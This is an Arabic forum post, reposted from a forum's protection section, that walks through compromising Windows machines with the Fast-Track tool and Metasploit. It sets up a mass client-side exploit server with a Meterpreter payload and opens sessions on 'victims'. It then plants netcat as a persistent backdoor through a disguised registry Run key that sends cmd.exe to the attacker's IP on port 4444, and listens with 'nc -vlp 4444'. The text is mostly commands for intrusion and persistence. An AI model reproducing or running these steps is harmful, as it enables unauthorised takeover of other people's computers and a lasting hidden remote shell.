[Michael_Sabry]

ندخل في صلب الموضوع ..

طبعا المكتوب واضح من عنوانه ..

راح نستخدم اداة الفاست تراك في تطبيق هجوم الـ Client-side

باختصار شديد .. هو تجميع اكبر عدد ممكن من الاكسبلويتات الموجودة بالميتاسبلويت في وقت واحد و في ايفريم واحد على سيرفر محلي ..

طيب ندخل على التيرمنال .. بوضعية الجذر

و نكتب الامر لدخول مجلد الفاست تراك

كود:
cd/pentest/exploits/fasttrack

لو تستعرض الملفات الموجودة بالمجلد .. بتلقى سكربت الفاست تراك بلغة البايثون ..

طيب نشغله بالامر ..

كود:
./fast-track.py -i

-i تعني تشغيل السكربت داخل التيرمنال ..

الان بيطلع لنا عدة خيارات ممكن تنفذها .. و كل مهمة لها رقم محدد

هجومنا المطلوب اسمه Mass Client-Side Attack و رقمه 4 .. يعني نحدده بالرقم 4

من ثم بيطلب منك السكربت وضع الاي بي اللي راح يكون سيرفر للتنصت عليه ( الاي بي تبعك طبعا )

من ثم بيعرض لك 4 بايلودات تختار منها اللي تبي .. يفضل Meterpreter لان راح نستخدمه بعد شوي لسهولته ..

ثم بيسالك اذا تبي تعمل ارب بويزنينج اطلب منه لا ..

الان الاداة تقوم بعملها و تجميع الثغرات الممكن و بدأ السيرفر ..

ننتظر الى ان تنتهي .. بكملة Server started

بامكانك عمل سبوفينج بالسيرفر .. ( شارحها في مواضيع سابقة بالتفصيل )

عموما .. الان نفرض لقطنا الضحية بيخبرك ان فيه جلسة جديدة مفتوحة ..

ندخل لها بالامر

كود:
sessions -i 1
1 يعني رقم الجلسة ..

الان امامك الضحية .. و يمكنك تتحكم فيه تحكم كامل

================================================== =========

دور المفاجئة :-

المفاجئة يا طويل العمر هي استخدام النت كات كـ Backdoor يتم حقنه بالرجيستري ليتنصت على الاي بي تبعنا داخل مجلد بدء التشغيل ..

اولا: نرفع النت كات الى على هالمسار داخل جهاز الضحية ..

كود:
upload /tmp/nc.exe C:\\windows\\system32\\nc.exe
الان ندخل على موجه الاوامر تبع الضحية ..

كود:
execute -c -H -f cmd.exe -i
وش السواة الحين ؟

امر بسيط لحقن مفتاح ريجيستري بهالقيمة .. nc -d -e cmd.exe 192.168.1.3 4444

مع التغيير للاي بي تبعك .. و المقصود بهالامر تنفيذ التنصت خلال بداية التشغيل بوضعية موجه الاوامر ..

و هذا هو الامر كامل

كود:
reg add hklm\software\microsoft\windows\currentversion\run systemfile /t reg_sz /d "nc -d -e cmd.exe 192.168.1.3 4444"/
reg add : واضح .. امر بدائي لاضافة اي مفتاح
hklm : و تعني مجلد HKEY_LOCAL_MACHINE
/v : و تعني اسم المفتاح و انا هنا موهت بالاسم systemfile
/t : و تعني نوع المفتاح و في الاغلب يكون reg_sz
/d : و هنا تتلخص الزبدة تبعنا .. و هي البيانات المطلوبة و هذي بيناتنا n c -d -e cmd.exe 192.168.1.3 4444

الان و بعد زرع المفتاح ..

نروح للتيرمنال و ونتنصت على البورت 4444 ..

كود:
nc -vlp 4444

و الضحية راح يشبك معك يوميا ..

================================================== =========

لمشاهدة التطبيق على اليوتيوب

منقول للفايده

المصدر: †† ارثوذكس †† - من قسم: قسم الحماية من الهكر